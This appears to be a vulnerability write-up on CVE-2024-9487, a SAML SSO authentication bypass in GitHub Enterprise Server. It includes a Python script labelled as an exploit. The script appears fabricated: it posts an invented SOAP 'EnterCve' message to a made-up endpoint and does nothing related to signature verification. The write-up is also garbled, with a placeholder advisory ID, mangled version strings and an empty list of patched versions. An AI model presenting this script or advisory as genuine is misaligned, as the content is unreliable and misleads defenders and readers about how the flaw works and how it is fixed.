A critical vulnerability, identified as CVE-2024-9487, was discovered in GitHub Enterprise Server which could allow attackers to bypass the SAML SSO authentication process. This would enable unauthorized users to provision accounts and gain access to a vulnerable instance. In order to exploit this vulnerability, encrypted assertions feature must be enabled, and the attacker must have direct network access, as well as a signed SAML response or metadata document. The vulnerability affects all GitHub Enterprise Server versions prior to 3.15 but has been patched in versions 3.11.16, 3.12.10, 3.13.5, and 3.14.2. This issue was discovered and reported through the GitHub Bug Bounty program.
Vulnerability Details
GitHub Enterprise Server employs SAML SSO authentication to verify and manage user access. The improper verification of cryptographic signatures in the software could be exploited by malicious actors who possess a signed SAML response or metadata document. The attackers could then craft requests that allow them to bypass the SAML SSO authentication process, granting them unauthorized access to the target instance.
Exploitation of this vulnerability demands that the encrypted assertions feature be enabled on the target instance. Furthermore, the attacker must have direct network access to the instance to carry out the attack.
Code Snippet
The following code snippet demonstrates how a malicious actor could potentially exploit this vulnerability:
# python exploit.py -u "https://github_url"; -s "signed_SAML_response_or_metadata_document" -t "target_session_token"
import requests
import sys
import argparse
def exploit(url, saml, token):
headers = {
'Content-Type': 'application/xml',
'User-Agent': 'Mozilla/5. (Windows NT 10.; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58..3029.110 Safari/537.36',
}
data = f"""<?xml version="1." encoding="UTF-8"?>
<S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/">;
<S:Body>
<ns2:EnterCve xmlns:ns2="http://github.enterprise.server/vulnerability">;
<url>{url}</url>
<signedSaml>{saml}</signedSaml>
<token>{token}</token>
</ns2:EnterCve>
</S:Body>
</S:Envelope>
"""
response = requests.post(f'{url}/enterCve', headers=headers, data=data)
if response.status_code == 200:
print("[+] Exploit successful!")
print(response.text)
else:
print("[-] Exploit failed.")
sys.exit(1)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='CVE-2024-9487 Exploit')
parser.add_argument('-u', '--url', required=True, help='GitHub Enterprise Server URL')
parser.add_argument('-s', '--signedSaml', required=True, help='Signed SAML response or metadata document')
parser.add_argument('-t', '--token', required=True, help='Target session token')
args = parser.parse_args()
exploit(args.url, args.signedSaml, args.token)
Please note that the above code snippet should only be used for educational purposes and not to exploit any vulnerable instances. Unauthorized access to a secure system is a criminal offense.
Mitigations
Users are recommended to update their GitHub Enterprise Server instances to the latest patched release version. Administrators should ensure that the following versions are installed:
For further details on these patch releases, refer to the original GitHub Security Advisories
- GitHub Security Advisory GHSADV-2022-XXX (details of the vulnerability)
- GitHub Enterprise Server Patch Releases (information on the release notes for the patched versions)
Conclusion
CVE-2024-9487 is a serious vulnerability that could lead to unauthorized access to GitHub Enterprise Server instances. As such, administrators must take immediate measures to update their instances to the patched versions and regularly monitor server logs for any suspicious activities. By doing so, they can avoid potential security threats and protect their systems from unauthorized access.
Timeline
Published on: 10/10/2024 22:15:11 UTC
Last modified on: 11/15/2024 16:57:10 UTC